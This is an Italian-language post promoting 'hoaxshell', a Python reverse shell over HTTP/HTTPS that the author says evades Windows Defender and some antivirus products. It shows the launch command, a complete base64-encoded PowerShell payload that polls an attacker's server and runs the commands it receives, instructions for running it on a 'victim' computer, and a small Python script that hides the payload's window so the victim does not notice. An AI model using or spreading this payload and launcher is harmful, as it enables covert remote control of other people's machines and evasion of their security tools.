Reverse Shell al momento non detectabile da Windows Defender e alcuni antivirus .
Navigando su Twitter ho trovato un progetto molto interessante dell'utente @t3l3machus , il quale potete trovare la repository su Github. La Rv Shell é scritta in python ed é basata sul traffico Https.
- Utilizzo :
L 'utilizzo é molto semplice , i comandi principali sono :
- ┌──(zer0day㉿kali)-[~/hoaxshell]
└─$ python3 hoaxshell.py -s IP
una volta avviato lo script tramite python , esso crerá subito il payload avviando il listener tramite il nostro indirizzo Ip.
- [Info] Generating reverse shell payload...
powershell -e JABzAD0AJwAxADkAMgAuADEANgA4AC4AMgAzADEALgAxADUAMgA6ADgAMAA4ADAAJwA7ACQAaQA9ACcAZgA4ADQAMgAwADYAYQAxAC0AMQAwAGYAMAAxAGIANwA0AC0AZAA0AGUAMQA2ADAAZAA4ACcAOwAkAHAAPQAnAGgAdAB0AHAAOgAvAC8AJwA7ACQAdgA9AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvAGYAOAA0ADIAMAA2AGEAMQAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAFgALQAwADkAMwAxAC0AYgA4ADIAOAAiAD0AJABpAH0AOwB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAJABjAD0AKABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACAALQBVAHIAaQAgACQAcAAkAHMALwAxADAAZgAwADEAYgA3ADQAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AMAA5ADMAMQAtAGIAOAAyADgAIgA9ACQAaQB9ACkALgBDAG8AbgB0AGUAbgB0ADsAaQBmACAAKAAkAGMAIAAtAG4AZQAgACcATgBvAG4AZQAnACkAIAB7ACQAcgA9AGkAZQB4ACAAJABjACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAHQAbwBwACAALQBFAHIAcgBvAHIAVgBhAHIAaQBhAGIAbABlACAAZQA7ACQAcgA9AE8AdQB0AC0AUwB0AHIAaQBuAGcAIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAcgA7ACQAdAA9AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHAAJABzAC8AZAA0AGUAMQA2ADAAZAA4ACAALQBNAGUAdABoAG8AZAAgAFAATwBTAFQAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAIgBYAC0AMAA5ADMAMQAtAGIAOAAyADgAIgA9ACQAaQB9ACAALQBCAG8AZAB5ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABlACsAJAByACkAIAAtAGoAbwBpAG4AIAAnACAAJwApAH0AIABzAGwAZQBlAHAAIAAwAC4AOAB9AA==
[Info] Type "help" to get a list of the available prompt commands.
[Info] Http Server started on port 8080.
[Important] Awaiting payload execution to initiate shell session...
hoaxshell >
Una volta fatto questo , non ci resta che avviare il payload sulla computer vittima :
Questa operazione per prova , puó essere direttamente eseguita dalla Powershell digitando il comando
powershell -e 'payload'
questo non é uno dei metodi migliori , perché la finestra del processo rimane aperta , e se proviamo a chiuderla salta la connessione dal listener. Io personalmente ho creato un semplicissimo script in python (4 righe) , in modo tale che il payload viene eseguito e il processo va in backgrond (senza finestra) .
Ecco lo script :
from os import system
def Execute_Payload():
Payload = system('''Powershell -command "Powershell.exe -windowstyle hidden {powershell -e payload"} ''')
Execute_Payload()
Ovviamente si puó fare una cosa fatta meglio , ad esempio modificare lo script hoaxshell.py in modo tale che crei il payload direttamente li .
Spero vi interessi 😄 , buona notte / buongiorno a tutti .